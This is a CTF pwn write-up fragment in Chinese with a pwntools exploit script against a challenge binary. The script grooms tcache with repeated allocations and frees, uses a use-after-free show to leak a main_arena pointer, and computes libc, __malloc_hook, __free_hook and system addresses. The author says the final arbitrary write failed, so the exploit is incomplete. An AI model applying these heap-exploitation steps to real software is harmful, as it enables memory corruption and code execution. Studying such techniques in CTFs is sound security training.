附件地址:https://t.wss.ink/f/a1932ijro2o
下面是自己写的部分exp
思路:
申请程序最大的内存,然后全部free掉
利用程序知道的super_666函数申请一块大内存
此时tcachebins会合并一部分成为smallbin
利用UAF泄露main_arena地址从而泄露libc
后面尝试进行任意写的时候就没有成功...
from pwn import *
# Target process and the libc build the writeup expects it to load.
io = process("./pwn")
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')

# pwntools context: amd64 Linux, 1s tube timeout, verbose ("debug") tube logging,
# and the terminal used when gdb.attach() opens a window.
context.os = 'linux'
context.arch = 'amd64'
context.timeout = 1
context.log_level = 'debug'
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
def cmd(opt, idx):
    """Drive the binary's menu: answer the ">>" prompt with *opt* and the
    "Index?" prompt with *idx* (both sent as ASCII digits plus newline)."""
    for prompt, value in ((">>", opt), ("Index?", idx)):
        io.sendlineafter(prompt, str(value).encode())
def super_666():
    """Select menu option 666 and answer its "hh!" prompt with 1023.

    Per the writeup header this is the program's own super_666 path, used
    here to request one large allocation; the exact prompt semantics are
    not visible in this file.
    """
    option, amount = 666, 1023
    io.sendlineafter(">>", str(option).encode())
    io.sendlineafter("hh!", str(amount).encode())
def add(idx, size):
    """Menu option 1: allocate a chunk of *size* bytes into slot *idx*."""
    option = 1
    cmd(option, idx)
    io.sendlineafter("Size?", str(size).encode())
def delete(idx):
    """Menu option 2: free the chunk held in slot *idx*."""
    option = 2
    return cmd(option, idx)
def show(idx):
    """Menu option 4: print the contents of slot *idx*."""
    option = 4
    return cmd(option, idx)
def edit(idx, content):
    """Menu option 3: overwrite slot *idx* with *content*.

    *content* is forwarded to the tube unchanged (caller supplies bytes or str).
    """
    option = 3
    cmd(option, idx)
    io.sendlineafter("Content?", content)
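# Stage 1: fill slots 0..15 with 0x60-byte allocations, then free them all in
# reverse order. The writeup's premise (header lines) is that a following large
# request consolidates some of the freed chunks into a small bin; that is an
# allocator-version-specific assumption not verifiable from this file.
for i in range(0x10):
    add(i, 0x60)
for j in reversed(range(0x10)):
    delete(j)

# The program's option-666 path requests one large allocation (see super_666).
super_666()
gdb.attach(io)
pause()

# Stage 2: show() on a slot that was already freed still dumps the chunk body,
# i.e. the program keeps serving a dangling index after delete (use-after-free).
# The freed chunk's bin pointer points into libc's main_arena; the 0x450 delta to
# __malloc_hook is specific to the libc build loaded above.
# NOTE(review): re-derive the 0x450 offset against the target libc before reuse.
show(0)
leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
__malloc_hook = leak - 0x450
libc.address = __malloc_hook - libc.sym['__malloc_hook']
# Resolved for a later stage that the writeup itself leaves unfinished.
system_addr = libc.sym['system']
__free_hook = libc.sym['__free_hook']

# pwntools' log.info() behaves like logging.Logger.info(): extra positional
# arguments are %-substituted into the message. The original messages had no
# placeholder, so the addresses were never printed (logging reported a
# formatting error instead). A %s placeholder fixes that.
log.info("------>>>> __malloc_hook = %s", hex(__malloc_hook))
log.info("------>>>> __free_hook   = %s", hex(__free_hook))
log.info("------>>>> system        = %s", hex(system_addr))
pause()
log.info("k" * 30)
io.interactive()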